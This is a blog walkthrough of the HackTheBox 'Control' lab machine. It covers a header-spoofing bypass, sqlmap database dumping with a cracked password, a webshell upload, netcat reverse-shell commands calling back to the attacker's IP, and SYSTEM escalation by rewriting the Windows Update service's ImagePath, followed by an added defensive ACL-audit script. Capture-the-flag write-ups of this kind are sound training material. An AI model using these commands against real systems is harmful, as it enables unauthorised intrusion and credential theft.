
Hackthebox Control

This post provides a walkthrough of the Control machine on HackTheBox. The user part is finding a SQLi and getting credentials. The privesc part was a bit hard for me; I spent too much time on it. IPPSEC's videos helped me with the privesc part. If you do not follow ippsec, you lose a lot.

nmap

# Nmap 7.80 scan initiated Fri Apr 24 15:50:07 2020 as: nmap -A -T4 -oA control 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, JavaRMI, LANDesk-RC, NCP, NotesRPC, SIPOptions, SMBProgNeg, WMSRequest, afp, oracle-tns: 
|_    Host '10.10.14.4' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   149.66 ms 10.10.14.1
2   149.60 ms 10.10.10.167

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 24 15:50:47 2020 -- 1 IP address (1 host up) scanned in 39.89 seconds

When I visited the web page, I examined the source code. I saw an IP address there, but I could not access the admin web page.

Screenshot: /admin.php

Screenshot: /index.php

Here we use the X-Forwarded-For HTTP header field, a common method for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer. I added the header with a Firefox extension, and after that I could access the admin web page. I found a SQLi in /view_product.php. I used Burp Suite to send a product request and saved the request to a file for use with sqlmap. This is the request.

POST /view_product.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://10.10.10.167
Connection: close
Referer: http://10.10.10.167/admin.php
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28

productId=34

Sqlmap did everything for us. We know the database service is MySQL. I saved the request in a file named sql.

sqlmap -r sql -D mysql -T user -C Password,User --dump 

We got the user and password and cracked the hash.


Hector:l33th4x0rhector

I could not access the box from outside with these creds, so I uploaded a shell with sqlmap.

sqlmap -r sql --file-write=/Desktop/htb/control/wwwolf-php-webshell/webshell.php --file-dest=C:/inetpub/wwwroot/shell.php


Now we have a low-privilege user shell. I tried to run PowerShell commands from this shell, but I could not. So I uploaded netcat with sqlmap and got a shell using netcat.

.\nc.exe 10.10.14.4 4444 -e cmd.exe


After that, it is easy to run PowerShell commands.

powershell -nop -exec bypass

We know Hector's creds. I created a PowerShell script to jump to Hector.

# Build a PSCredential for Hector from the cracked password
$password = "l33th4x0rhector" | ConvertTo-SecureString -AsPlainText -Force
$username = "Fidelity\Hector"
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
echo $credential
# Run commands locally over WinRM as Hector: copy nc.exe, then connect back to the listener
Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {cp C:\inetpub\wwwroot\nc.exe C:\Users\Hector\Documents}
Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {C:\Users\Hector\Documents\nc.exe 10.10.14.4 7878 -e cmd.exe}

I have a Hector shell.


User Flag


Privilege Escalation

When I searched for what was on the machine, I found a ConsoleHost_history.txt with these commands.

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

I searched the services on the box.

get-childitem HKLM:\SYSTEM\CurrentControlset\services | format-list 

I found the wuauserv service. This is the Windows Update service, and it runs with SYSTEM permissions. In this part we can change the ImagePath of this service.


The wuauserv service ImagePath looks like this.

ImagePath       : C:\Windows\system32\svchost.exe -k  netsvcs -p 

After that, I changed the ImagePath:

Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe 10.10.14.4 9090 -e cmd" /f

and restart the service:

Stop-Service wuauserv; Start-Service wuauserv
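The step above only works because a non-admin user holds write rights on the service's registry key. As a defender-side check, here is a PowerShell function (added here, not from the original post or the box) that lists every service key under HKLM:\SYSTEM\CurrentControlSet\Services granting write-equivalent rights to an identity outside the usual admin set. The function name and the default trusted-identity list are my own choices.

```powershell
# Added example: audit service registry keys for write access by non-admin identities.
# Assumes Windows PowerShell 5.1+ (or PowerShell 7 on Windows) and default read
# access to the Services hive; it only reads ACLs and changes nothing.
function Find-WritableServiceKeys {
    param(
        # Identities that are expected to have write rights on service keys.
        [string[]]$TrustedIdentities = @(
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators',
            'NT SERVICE\TrustedInstaller'
        )
    )
    # Rights that let a principal rewrite values (such as ImagePath) or take over the key's DACL.
    $writeBits = [int]([System.Security.AccessControl.RegistryRights]'SetValue, ChangePermissions, TakeOwnership')
    $inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }   # DACL not readable by this account; skip the key
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Inherit-only entries apply to subkeys, not to this key itself.
            if (([int]$ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
            if ($TrustedIdentities -contains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.RegistryRights -band $writeBits) -eq 0) { continue }
            # Report the current ImagePath so a hijacked binary is visible in the same row.
            $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            [pscustomobject]@{
                Service   = $key.PSChildName
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                ImagePath = $imagePath
            }
        }
    }
}

Find-WritableServiceKeys | Sort-Object Service | Format-Table -AutoSize
```

An entry such as a plain user or Authenticated Users with SetValue or FullControl on a key like wuauserv is the misconfiguration to remove; the fix is to reset the key's ACL to the inherited default rather than to hide the ImagePath.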


Root Flag


This post is licensed under CC BY 4.0
